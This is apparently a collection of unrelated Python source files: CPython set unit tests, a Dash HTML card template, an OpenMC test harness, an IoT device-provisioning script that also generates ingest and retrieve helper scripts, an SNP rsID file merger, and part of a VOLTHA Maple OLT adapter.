'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_constructor(self):
for cons in (set, frozenset):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(sorted(cons(g(s)), key=repr), sorted(g(s), key=repr))
self.assertRaises(TypeError, cons , X(s))
self.assertRaises(TypeError, cons , N(s))
self.assertRaises(ZeroDivisionError, cons , E(s))
def test_inline_methods(self):
s = set('november')
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for meth in (s.union, s.intersection, s.difference, s.symmetric_difference, s.isdisjoint):
for g in (G, I, Ig, L, R):
expected = meth(data)
actual = meth(g(data))
if isinstance(expected, bool):
self.assertEqual(actual, expected)
else:
self.assertEqual(sorted(actual, key=repr), sorted(expected, key=repr))
self.assertRaises(TypeError, meth, X(s))
self.assertRaises(TypeError, meth, N(s))
self.assertRaises(ZeroDivisionError, meth, E(s))
def test_inplace_methods(self):
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for methname in ('update', 'intersection_update',
'difference_update', 'symmetric_difference_update'):
for g in (G, I, Ig, S, L, R):
s = set('january')
t = s.copy()
getattr(s, methname)(list(g(data)))
getattr(t, methname)(g(data))
self.assertEqual(sorted(s, key=repr), sorted(t, key=repr))
self.assertRaises(TypeError, getattr(set('january'), methname), X(data))
self.assertRaises(TypeError, getattr(set('january'), methname), N(data))
self.assertRaises(ZeroDivisionError, getattr(set('january'), methname), E(data))
class bad_eq:
def __eq__(self, other):
if be_bad:
set2.clear()
raise ZeroDivisionError
return self is other
def __hash__(self):
return 0
class bad_dict_clear:
def __eq__(self, other):
if be_bad:
dict2.clear()
return self is other
def __hash__(self):
return 0
class TestWeirdBugs(unittest.TestCase):
def test_8420_set_merge(self):
# This used to segfault
global be_bad, set2, dict2
be_bad = False
set1 = {bad_eq()}
set2 = {bad_eq() for i in range(75)}
be_bad = True
self.assertRaises(ZeroDivisionError, set1.update, set2)
be_bad = False
set1 = {bad_dict_clear()}
dict2 = {bad_dict_clear(): None}
be_bad = True
set1.symmetric_difference_update(dict2)
def test_iter_and_mutate(self):
# Issue #24581
s = set(range(100))
s.clear()
s.update(range(100))
si = iter(s)
s.clear()
a = list(range(100))
s.update(range(100))
list(si)
def test_merge_and_mutate(self):
class X:
def __hash__(self):
return hash(0)
def __eq__(self, o):
other.clear()
return False
other = set()
other = {X() for i in range(10)}
s = {0}
s.update(other)
# Application tests (based on David Eppstein's graph recipes) ================================
def powerset(U):
"""Generates all subsets of a set or sequence U."""
U = iter(U)
try:
x = frozenset([next(U)])
for S in powerset(U):
yield S
yield S | x
except StopIteration:
yield frozenset()
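# Illustrative behaviour of powerset (a sketch added here for clarity, not part
# of the original recipe): every subset is produced exactly once, e.g.
#   sorted(map(sorted, powerset('ab'))) == [[], ['a'], ['a', 'b'], ['b']]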
def cube(n):
"""Graph of n-dimensional hypercube."""
singletons = [frozenset([x]) for x in range(n)]
return dict([(x, frozenset([x^s for s in singletons]))
for x in powerset(range(n))])
def linegraph(G):
"""Graph, the vertices of which are edges of G,
with two vertices being adjacent iff the corresponding
edges share a vertex."""
L = {}
for x in G:
for y in G[x]:
nx = [frozenset([x,z]) for z in G[x] if z != y]
ny = [frozenset([y,z]) for z in G[y] if z != x]
L[frozenset([x,y])] = frozenset(nx+ny)
return L
def faces(G):
    'Return a set of faces in G, where a face is a set of vertices on that face'
    # currently limited to triangles, squares, and pentagons
f = set()
for v1, edges in G.items():
for v2 in edges:
for v3 in G[v2]:
if v1 == v3:
continue
if v1 in G[v3]:
f.add(frozenset([v1, v2, v3]))
else:
for v4 in G[v3]:
if v4 == v2:
continue
if v1 in G[v4]:
f.add(frozenset([v1, v2, v3, v4]))
else:
for v5 in G[v4]:
if v5 == v3 or v5 == v2:
continue
if v1 in G[v5]:
f.add(frozenset([v1, v2, v3, v4, v5]))
return f
class TestGraphs(unittest.TestCase):
def test_cube(self):
g = cube(3) # vert --> {v1, v2, v3}
vertices1 = set(g)
self.assertEqual(len(vertices1), 8) # eight vertices
for edge in g.values():
self.assertEqual(len(edge), 3) # each vertex connects to three edges
vertices2 = set(v for edges in g.values() for v in edges)
self.assertEqual(vertices1, vertices2) # edge vertices in original set
cubefaces = faces(g)
self.assertEqual(len(cubefaces), 6) # six faces
for face in cubefaces:
self.assertEqual(len(face), 4) # each face is a square
def test_cuboctahedron(self):
# http://en.wikipedia.org/wiki/Cuboctahedron
# 8 triangular faces and 6 square faces
# 12 identical vertices each connecting a triangle and square
g = cube(3)
        cuboctahedron = linegraph(g) # V --> {V1, V2, V3, V4}
self.assertEqual(len(cuboctahedron), 12)# twelve vertices
vertices = set(cuboctahedron)
for edges in cuboctahedron.values():
self.assertEqual(len(edges), 4) # each vertex connects to four other vertices
othervertices = set(edge for edges in cuboctahedron.values() for edge in edges)
self.assertEqual(vertices, othervertices) # edge vertices in original set
cubofaces = faces(cuboctahedron)
facesizes = collections.defaultdict(int)
for face in cubofaces:
facesizes[len(face)] += 1
self.assertEqual(facesizes[3], 8) # eight triangular faces
self.assertEqual(facesizes[4], 6) # six square faces
for vertex in cuboctahedron:
edge = vertex # Cuboctahedron vertices are edges in Cube
self.assertEqual(len(edge), 2) # Two cube vertices define an edge
for cubevert in edge:
self.assertIn(cubevert, g)
#==============================================================================
if __name__ == "__main__":
unittest.main()
|
py | 1a49edfa9a094248e2ae8b0bcb70ba249af497e4 | from dash_labs.templates.base import BaseTemplate
import dash_html_components as html
class HtmlCard(BaseTemplate):
"""
Simple template that places all components in a few html Div elements with a
card-like border.
"""
_valid_locations = ("bottom", "top")
_default_input_location = "bottom"
_default_output_location = "top"
def __init__(self, app, title=None, width=None):
super().__init__(app)
self.title = title
self.width = width
def _perform_layout(self):
# No callbacks here. Must be constant or idempotent
children = []
if self.title:
children.append(html.H2(self.title))
children.append(html.Div(self.get_containers("top")))
children.append(html.Hr())
children.append(html.Div(self.get_containers("bottom")))
layout = html.Div(
style={
"width": self.width,
"border": "1px solid lightgray",
"padding": 10,
"border-radius": "6px",
},
children=html.Div(children=children),
)
return layout
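# Hypothetical usage sketch (app name and argument values assumed, not taken
# from this module): the template is bound to a Dash app, matching the
# __init__(app, title, width) signature above, and the surrounding dash-labs
# machinery then fills the "top" and "bottom" containers built in
# _perform_layout().
#
#   import dash
#   app = dash.Dash(__name__)
#   card = HtmlCard(app, title="Demo card", width="500px")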
|
py | 1a49ee8a82012301d238a42230e1063498dda0c3 | #!/usr/bin/env python
import os
import sys
sys.path.insert(0, os.pardir)
from testing_harness import TestHarness, PyAPITestHarness
import openmc
class MGBasicTestHarness(PyAPITestHarness):
def _build_inputs(self):
super(MGBasicTestHarness, self)._build_inputs()
if __name__ == '__main__':
harness = MGBasicTestHarness('statepoint.10.*', False, mg=True)
harness.main()
|
py | 1a49eef1046e93e426aa4761074ac4bc9847a015 | # create an IoTS device of choice with just one program
# and no necessary human interaction
# write a script for credential conversion
# finally write 2 scripts to ingest using the converted credentials / retrieve
config_host='<hostname>'
config_instance='<instance id>'
config_tenant='<tenant id>'
config_user='<user>'
config_password='<password>'
config_alternateId_4_device_base='<chosen alternateId base>'
config_alternateId_4_device_version='_01'
import sys
import requests
import json
alternateId_4_device=config_alternateId_4_device_base+config_alternateId_4_device_version
alternateId_4_capability_up01='c_up01_' + config_alternateId_4_device_base
alternateId_4_capability_up02='c_up02_' + config_alternateId_4_device_base
alternateId_4_sensortype=config_alternateId_4_device_base
alternateId_4_sensor=alternateId_4_device
certfile_name='./cert.pem'
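# Worked example of the identifier derivation above (base value chosen purely
# for illustration): with config_alternateId_4_device_base='demo' and version
# '_01' the script would end up using
#   alternateId_4_device          -> 'demo_01'
#   alternateId_4_capability_up01 -> 'c_up01_demo'
#   alternateId_4_capability_up02 -> 'c_up02_demo'
#   alternateId_4_sensortype      -> 'demo'
#   alternateId_4_sensor          -> 'demo_01'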
# ========================================================================
# these values are filled as you go through the steps
gw_id_4_rest=''
my_device=''
my_capability_up01=''
my_capability_up02=''
my_sensortype=''
my_sensor=''
# ========================================================================
print('listing gateways')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/gateways'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
if (status_code == 200):
print(response.text)
try:
json_payload=json.loads(response.text)
for individual_dataset in json_payload:
print(individual_dataset['id'] + ' - ' + individual_dataset['protocolId'])
if ((individual_dataset['protocolId'] == 'rest') and (individual_dataset['status'] == 'online')):
gw_id_4_rest=individual_dataset['id']
print('Using gateway: ' + gw_id_4_rest)
except (ValueError) as e:
print(e)
# ===
print('creating the device')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/devices'
headers={'Content-Type' : 'application/json'}
payload='{ "gatewayId" : "' + gw_id_4_rest + '", "name" : "device_' + alternateId_4_device + '", "alternateId" : "' + alternateId_4_device + '" }'
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_device=json_payload['id']
print('Using device id: ' + my_device)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('retrieving the certificate')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/devices/' + my_device + '/authentications/clientCertificate/pem'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
secret=json_payload['secret']
pem=json_payload['pem']
print('secret: ' + secret)
print('pem: ' + pem)
certfile=open("cert.pem", "w")
certfile.write(pem)
certfile.close()
pem_script=open("convert_pem.sh", "w")
pem_script.write("echo 'Please use pass phrase " + secret + " for the certificate import from " + certfile_name + " in the conversion !'\n\n")
pem_script.write("openssl rsa -in " + certfile_name + " -out credentials.key\n")
pem_script.write("openssl x509 -in " + certfile_name + " -out credentials.crt\n")
pem_script.close()
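        # For reference (illustrative only, using the default certfile_name of
        # './cert.pem'), the generated convert_pem.sh contains roughly:
        #   echo 'Please use pass phrase <secret> for the certificate import ...'
        #   openssl rsa -in ./cert.pem -out credentials.key
        #   openssl x509 -in ./cert.pem -out credentials.crt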
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the capability (up01)')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/capabilities'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "capability_up01_' + alternateId_4_capability_up01 + '", "properties" : [ { "name" : "p01_up01", "dataType" : "string" }, { "name" : "p02_up01", "dataType" : "string" } ], "alternateId" : "' + alternateId_4_capability_up01 + '" }'
print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_capability_up01=json_payload['id']
print('Using (for up01) capability id: ' + my_capability_up01)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the capability (up02)')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/capabilities'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "capability_up02_' + alternateId_4_capability_up02 + '", "properties" : [ { "name" : "p01_up02", "dataType" : "string" }, { "name" : "p02_up02", "dataType" : "string" } ], "alternateId" : "' + alternateId_4_capability_up02 + '" }'
print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_capability_up02=json_payload['id']
print('Using (for up02) capability id: ' + my_capability_up02)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the sensortype')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/sensorTypes'
headers={'Content-Type' : 'application/json'}
payload='{ "name" : "sensortype_' + alternateId_4_sensortype + '", "capabilities" : [ { "id" : "' + my_capability_up01 + '", "type" : "measure" }, { "id" : "' + my_capability_up02 + '", "type" : "measure" } ] }'
# so far the alternateId for a sensorType needs to be a positive integer - so the code below does not work
# payload='{ "name" : "sensortype_' + alternateId_4_sensortype + '", "capabilities" : [ { "id" : "' + my_capability_up01 + '", "type" : "measure" }, { "id" : "' + my_capability_up02 + '", "type" : "measure" } ], "alternateId" : "' + alternateId_4_sensortype + '" }'
# print(payload)
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_sensortype=json_payload['id']
print('Using sensortype id: ' + my_sensortype)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
print('creating the sensor')
request_url='https://' + config_host + '/' + config_instance + '/iot/core/api/v1/tenant/' + config_tenant + '/sensors'
headers={'Content-Type' : 'application/json'}
payload='{ "name": "sensor_' + alternateId_4_sensor + '", "deviceId" : "' + my_device + '", "sensorTypeId" : "' + my_sensortype + '", "alternateId" : "' + alternateId_4_sensor + '" }'
response=requests.post(request_url, headers=headers, auth=(config_user, config_password), data=payload)
status_code=response.status_code
print(str(status_code) + " " + str(response.text))
if (status_code == 200):
try:
json_payload=json.loads(response.text)
my_sensor=json_payload['id']
print('Using sensor id: ' + my_sensor)
except (ValueError) as e:
print(e)
else:
exit(0)
# ===
# now also write a separate script to ingest data
ingest_script=open("ingest.py", "w")
ingest_script.write("import requests\n\n")
ingest_script.write("config_host='" + config_host + "'\n")
ingest_script.write("config_alternateId_4_device='" + alternateId_4_device + "'\n")
ingest_script.write("config_alternateId_4_capability_up01='c_up01_" + config_alternateId_4_device_base + "'\n")
ingest_script.write("config_alternateId_4_capability_up02='c_up02_" + config_alternateId_4_device_base + "'\n")
ingest_script.write('''
alternateId_4_sensor=config_alternateId_4_device
request_url='https://' + config_host + '/iot/gateway/rest/measures/' + config_alternateId_4_device
# ingest for capability up01
payload='{ \"capabilityAlternateId\" : \"' + config_alternateId_4_capability_up01 + '\", \"measures\" : [[ \"value for p01_up01\", \"value for p02_up01\" ]], \"sensorAlternateId\":\"' + alternateId_4_sensor + '\" }'
headers={'Content-Type' : 'application/json'}
response=requests.post(request_url, data=payload, headers=headers, cert=('./credentials.crt', './credentials.key'))
print(response.status_code)
print(response.text)
# ingest for capability up02
payload='{ \"capabilityAlternateId\" : \"' + config_alternateId_4_capability_up02 + '\", \"measures\" : [[ \"value for p01_up02\", \"value for p02_up02\" ]], \"sensorAlternateId\":\"' + alternateId_4_sensor + '\" }'
headers={'Content-Type' : 'application/json'}
response=requests.post(request_url, data=payload, headers=headers, cert=('./credentials.crt', './credentials.key'))
print(response.status_code)
print(response.text)
''')
ingest_script.close()
# ===
# now also write a separate script to retrieve data
retrieve_script=open("retrieve.py", "w")
retrieve_script.write("import requests\n")
retrieve_script.write("import json\n\n")
retrieve_script.write("config_host='" + config_host + "'\n")
retrieve_script.write("config_tenant='" + config_tenant + "'\n")
retrieve_script.write("config_user='" + config_user + "'\n")
retrieve_script.write("config_password='" + config_password + "'\n\n")
retrieve_script.write("config_my_device='" + my_device + "'\n")
retrieve_script.write("config_my_capability_up01='" + my_capability_up01 + "'\n")
retrieve_script.write('''
request_url='https://' + config_host + '/iot/processing/api/v1/tenant/' + config_tenant + '/measures/capabilities/' + config_my_capability_up01 + '?orderby=timestamp%20desc&filter=deviceId%20eq%20%27' + config_my_device + '%27&skip=0&top=100'
headers={'Content-Type' : 'application/json'}
response=requests.get(request_url, headers=headers, auth=(config_user, config_password))
status_code=response.status_code
if (status_code == 200):
print(response.text)
try:
json_payload=json.loads(response.text)
for individual_measure in json_payload:
print('value: ' + str(individual_measure['measure']))
except (ValueError) as e:
print(e)
''')
retrieve_script.close()
print("=== summary ===")
print("device: " + str(my_device) + " altId: " + str(alternateId_4_device))
print("capability up01: " + str(my_capability_up01) + " altId: " + str(alternateId_4_capability_up01))
print("capability up02: " + str(my_capability_up02) + " altId: " + str(alternateId_4_capability_up02))
print("sensortype: " + str(my_sensortype))
print("sensor: " + str(my_sensor) + " altId: " + str(alternateId_4_sensor))
print("=== summary ===")
# ===
|
py | 1a49ef347f05e01bdbd1c7e3c6e7be2d538ffb2b | # ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Houwen Peng and Zhipeng Zhang
# Details: import other paths
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path as osp
import sys
def add_path(path):
if path not in sys.path:
sys.path.insert(0, path)
this_dir = osp.dirname(__file__)
lib_path = osp.join(this_dir, '..', 'lib')
add_path(lib_path)
|
py | 1a49ef907243d811a66ad28281ec08afb5dfeb75 | #!/usr/bin/env python3
import sys
import os
import argparse
def parseArguments():
parser = argparse.ArgumentParser(description='transform file and header')
parser.add_argument("--list_file", help="", type=str,required=True)
    parser.add_argument('--use_rs',type=int,help="if need to be limited at some rs", default=0)
parser.add_argument("--out", help="output format ldsc, default none", type=str,required=True)
args = parser.parse_args()
return args
args=parseArguments()
splfile=args.list_file.split(',')
DicByRs={}
listRs=list([])
listChrBp={}
rsissue=''
listrsissue=set()
listchrissue=set()
for File in splfile :
    print(File)
    Fread=open(File)
    FreadL=Fread.readline().split()
    Fread.close()
    Fread=open(File)
    if len(FreadL)==3 :
        # 3-column file: rsID, A1, A2
        for line in Fread :
            splt=line.replace('\n', '').split()
            if splt[0] not in DicByRs :
                DicByRs[splt[0]]=[None,None,splt[1],splt[2],None]
            else :
                RsInfo=DicByRs[splt[0]]
                # alleles must match the ones already recorded (allowing a swap)
                balisegood=(splt[1]==RsInfo[2] and splt[2]==RsInfo[3]) or (splt[1]==RsInfo[3] and splt[2]==RsInfo[2])
                if balisegood==False :
                    listrsissue.add(splt[0])
    elif len(FreadL)==6 :
        # 6-column file: rsID, Chro, Pos, A1, A2, newRs
        for line in Fread :
            splt=line.replace('\n', '').split()
            if splt[0] not in DicByRs :
                DicByRs[splt[0]]=[splt[1],splt[2],splt[3],splt[4],splt[5]]
            else :
                RsInfo=DicByRs[splt[0]]
                # alleles must match the ones already recorded (allowing a swap)
                balisegood=(splt[3]==RsInfo[2] and splt[4]==RsInfo[3]) or (splt[3]==RsInfo[3] and splt[4]==RsInfo[2])
                if balisegood==False :
                    listrsissue.add(splt[0])
                    listchrissue.add(splt[1])
                # check pos and chr: flag the rs when chromosome or position disagrees,
                # otherwise fill them in if they were still unknown
                if RsInfo[0] :
                    if RsInfo[0] != splt[1] or RsInfo[1] != splt[2] :
                        listrsissue.add(splt[0])
                else :
                    RsInfo[0]=splt[1]
                    RsInfo[1]=splt[2]
                    RsInfo[4]=splt[5]
    else :
        print("column error number :"+str(len(FreadL)))
        sys.exit(3)
    Fread.close()
writeRs=open(args.out, 'w')
writeRs2=open(args.out+'_allinfo', 'w')
for rs in DicByRs :
    RsInfo=DicByRs[rs]
    # some fields can still be None when an rs was only seen in a 3-column file
    RsInfoStr='\t'.join([str(x) for x in RsInfo])
    if rs not in listrsissue :
        if args.use_rs==1 :
            writeRs.write(rs+'\t'+str(RsInfo[3])+'\t'+str(RsInfo[4])+'\n')
        else :
            writeRs.write(rs+'\t'+RsInfoStr+'\n')
    writeRs2.write(rs+'\t'+RsInfoStr+'\n')
writeRs.close()
writeRs2.close()
writeRsError=open(args.out+'_issue', 'w')
for rs in listrsissue :
    RsInfo=DicByRs[rs]
    writeRsError.write(rs+'\t'+'\t'.join([str(x) for x in RsInfo])+'\n')
writeRsError.close()
|
py | 1a49ef9673f1fcd6a6fdf6bc100240c4f9d9b6a7 | #
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Maple OLT/ONU adapter.
"""
from uuid import uuid4
import arrow
import binascii
from scapy.layers.l2 import Ether, Dot1Q
from twisted.internet import reactor
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.spread import pb
from twisted.internet.defer import inlineCallbacks, returnValue, DeferredQueue
from zope.interface import implementer
from common.frameio.frameio import BpfProgramFilter, hexify
from voltha.adapters.interface import IAdapterInterface
from voltha.core.logical_device_agent import mac_str_to_tuple
import voltha.core.flow_decomposer as fd
from voltha.protos import third_party
from voltha.protos.adapter_pb2 import Adapter
from voltha.protos.adapter_pb2 import AdapterConfig
from voltha.protos.common_pb2 import LogLevel, OperStatus, ConnectStatus, \
AdminState
from voltha.protos.device_pb2 import DeviceType, DeviceTypes, Port, Device, \
PmConfigs, PmConfig, PmGroupConfig
from voltha.protos.health_pb2 import HealthStatus
from google.protobuf.empty_pb2 import Empty
from voltha.protos.events_pb2 import KpiEvent, MetricValuePairs
from voltha.protos.events_pb2 import KpiEventType
from voltha.protos.events_pb2 import AlarmEvent, AlarmEventType, \
AlarmEventSeverity, AlarmEventState, AlarmEventCategory
from voltha.protos.logical_device_pb2 import LogicalPort, LogicalDevice
from voltha.protos.openflow_13_pb2 import OFPPS_LIVE, OFPPF_FIBER, \
OFPPF_1GB_FD, OFPC_GROUP_STATS, OFPC_PORT_STATS, OFPC_TABLE_STATS, \
OFPC_FLOW_STATS, OFPP_CONTROLLER, OFPXMC_OPENFLOW_BASIC, \
ofp_switch_features, ofp_desc, ofp_port
from voltha.registry import registry
from voltha.extensions.omci.omci import *
_ = third_party
log = structlog.get_logger()
PACKET_IN_VLAN = 4091
is_inband_frame = BpfProgramFilter('(ether[14:2] & 0xfff) = 0x{:03x}'.format(
PACKET_IN_VLAN))
class MapleOltPmMetrics:
class Metrics:
def __init__(self, config, value=0, is_group=False):
self.config = config
self.value = value
self.is_group = is_group
def __init__(self,device):
self.pm_names = {'tx_64','tx_65_127', 'tx_128_255', 'tx_256_511',
'tx_512_1023', 'tx_1024_1518', 'tx_1519_9k', 'rx_64',
'rx_65_127', 'rx_128_255', 'rx_256_511', 'rx_512_1023',
'rx_1024_1518', 'rx_1519_9k', 'tx_pkts', 'rx_pkts',
'tx_bytes', 'rx_bytes'}
self.pm_group_names = {'nni'}
self.device = device
self.id = device.id
self.default_freq = 150
self.pon_metrics = dict()
self.nni_metrics = dict()
for m in self.pm_names:
self.pon_metrics[m] = \
self.Metrics(config = PmConfig(name=m,
type=PmConfig.COUNTER,
enabled=True), value = 0)
self.nni_metrics[m] = \
self.Metrics(config = PmConfig(name=m,
type=PmConfig.COUNTER,
enabled=True), value = 0)
self.pm_group_metrics = dict()
for m in self.pm_group_names:
self.pm_group_metrics[m] = \
self.Metrics(config = PmGroupConfig(group_name=m,
group_freq=self.default_freq,
enabled=True),
is_group = True)
for m in sorted(self.nni_metrics):
pm=self.nni_metrics[m]
self.pm_group_metrics['nni'].config.metrics.extend([PmConfig(
name=pm.config.name,
type=pm.config.type,
enabled=pm.config.enabled)])
@inlineCallbacks
def configure_pm_collection_freq(self, freq, remote):
log.info('configuring-pm-collection-freq',
freq=freq)
try:
data = yield remote.callRemote('set_stats_collection_interval', 0,
freq)
log.info('configured-pm-collection-freq', data=data)
except Exception as e:
log.exception('configure-pm-collection-freq', exc=str(e))
def enable_pm_collection(self, pm_group, remote):
if pm_group == 'nni':
self.configure_pm_collection_freq(self.default_freq/10, remote)
def disable_pm_collection(self, pm_group, remote):
if pm_group == 'nni':
self.configure_pm_collection_freq(0, remote)
def update(self, device, pm_config, remote):
if self.default_freq != pm_config.default_freq:
self.default_freq = pm_config.default_freq
if pm_config.grouped is True:
for m in pm_config.groups:
self.pm_group_metrics[m.group_name].config.enabled = m.enabled
if m.enabled is True:
self.enable_pm_collection(m.group_name, remote)
else:
self.disable_pm_collection(m.group_name, remote)
else:
for m in pm_config.metrics:
self.pon_metrics[m.name].config.enabled = m.enabled
self.nni_metrics[m.name].config.enabled = m.enabled
def make_proto(self):
pm_config = PmConfigs(
id=self.id,
default_freq=self.default_freq,
grouped = True,
freq_override = False)
for m in self.pm_group_names:
pm_config.groups.extend([self.pm_group_metrics[m].config])
return pm_config
class MapleOltRxHandler(pb.Root):
def __init__(self, device_id, adapter, onu_queue):
self.device_id = device_id
self.adapter = adapter
self.onu_discovered_queue = onu_queue
self.adapter_agent = adapter.adapter_agent
self.adapter_name = adapter.name
# registry('main').get_args().external_host_address
self.pb_server_ip = '192.168.24.20'
self.pb_server_port = 24497
self.pb_server_factory = pb.PBServerFactory(self)
# start PB server
self.listen_port = reactor.listenTCP(self.pb_server_port,
self.pb_server_factory)
self.omci_rx_queue = DeferredQueue()
log.info('PB-server-started-on-port', port=self.pb_server_port)
def get_ip(self):
return self.pb_server_ip
def get_port(self):
return self.pb_server_port
def get_host(self):
return self.listen_port.getHost()
def remote_echo(self, pkt_type, pon, onu, port, crc_ok, msg_size, msg_data):
log.info('received-omci-msg',
pkt_type=pkt_type,
pon_id=pon,
onu_id=onu,
port_id=port,
crc_ok=crc_ok,
msg_size=msg_size,
msg_data=hexify(msg_data))
self.omci_rx_queue.put((onu, msg_data))
def receive_omci_msg(self):
return self.omci_rx_queue.get()
def remote_report_stats(self, _object, key, stats_data):
log.info('received-stats-msg',
object=_object,
key=key,
stats=stats_data)
prefix = 'voltha.{}.{}'.format(self.adapter_name, self.device_id)
try:
ts = arrow.utcnow().timestamp
prefixes = {
prefix + '.nni': MetricValuePairs(metrics=stats_data)
}
kpi_event = KpiEvent(
type=KpiEventType.slice,
ts=ts,
prefixes=prefixes
)
self.adapter_agent.submit_kpis(kpi_event)
except Exception as e:
log.exception('failed-to-submit-kpis', e=e)
def remote_report_event(self, _object, key, event, event_data=None):
def _convert_serial_data(data):
b = bytearray()
b.extend(data)
return binascii.hexlify(b)
log.info('received-event-msg',
object=_object,
key=key,
event_str=event,
event_data=event_data)
if _object == 'device':
# key: {'device_id': <int>}
# event: 'state-changed'
# event_data: {'state_change_successful': <False|True>,
# 'new_state': <str> ('active-working'|'inactive')}
pass
elif _object == 'nni':
# key: {'device_id': <int>, 'nni': <int>}
pass
elif _object == 'pon_ni':
# key: {'device_id': <int>, 'pon_ni': <int>}
# event: 'state-changed'
# event_data: {'state_change_successful': <False|True>,
# 'new_state': <str> ('active-working'|'inactive')}
#
# event: 'onu-discovered'
# event_data: {'serial_num_vendor_id': <str>
# 'serial_num_vendor_specific': <str>
# 'ranging_time': <int>
# 'onu_id': <int>
# 'us_line_rate': <int> (0=2.5G, 1=10G)
# 'ds_pon_id': <int>
# 'us_pon_id': <int>
# 'tuning_granularity': <int>
# 'step_tuning_time': <int>
# 'attenuation': <int>
# 'power_levelling_caps': <int>}
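            # A hypothetical 'onu-discovered' event_data payload, to illustrate
            # the fields listed above (values invented, not from a real device):
            #   {'serial_num_vendor_id': 'BRCM', 'serial_num_vendor_specific': '12345678',
            #    'onu_id': 65535, 'ranging_time': 0, 'us_line_rate': 0, ...}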
if 'onu-discovered' == event and event_data is not None:
event_data['_device_id'] = key['device_id'] if 'device_id' in key else None
event_data['_pon_id'] = key['pon_id'] if 'pon_id' in key else None
event_data['_vendor_id'] = _convert_serial_data(event_data['serial_num_vendor_id']) \
if 'serial_num_vendor_id' in event_data else None
event_data['_vendor_specific'] = _convert_serial_data(event_data['serial_num_vendor_specific']) \
if 'serial_num_vendor_specific' in event_data else None
self.onu_discovered_queue.put(event_data)
log.info('onu-discovered-event-added-to-queue', event_data=event_data)
elif _object == 'onu':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>}
# event: 'activation-completed'
# event_data: {'activation_successful': <False|True>,
# act_fail_reason': <str>}
#
# event: 'deactivation-completed'
# event_data: {'deactivation_successful': <False|True>}
#
# event: 'ranging-completed'
# event_data: {'ranging_successful': <False|True>,
# 'ranging_fail_reason': <str>,
# 'eqd': <int>,
# 'number_of_ploams': <int>,
# 'power_level': <int>}
#
# event: 'enable-completed'
# event_data: {'serial_num-vendor_id': <str>
# 'serial_num-vendor_specific: <str>}
#
# event: 'disable-completed'
# event_data: {'serial_num-vendor_id': <str>
# 'serial_num-vendor_specific: <str>}
# Get child_device from onu_id
child_device = self.adapter_agent.get_child_device(self.device_id, onu_id=key['onu_id'])
assert child_device is not None
# Build the message, the ONU adapter uses the proxy_address
# to uniquely identify a specific ONU
msg = {'proxy_address':child_device.proxy_address, 'event':event, 'event_data':event_data}
# Send the event message to the ONU adapter
self.adapter_agent.publish_inter_adapter_message(child_device.id, msg)
elif _object == 'alloc_id':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>, 'alloc_id': ,<int>}
pass
elif _object == 'gem_port':
# key: {'device_id': <int>, 'pon_ni': <int>, 'onu_id': <int>, 'gem_port': ,<int>}
pass
elif _object == 'trx':
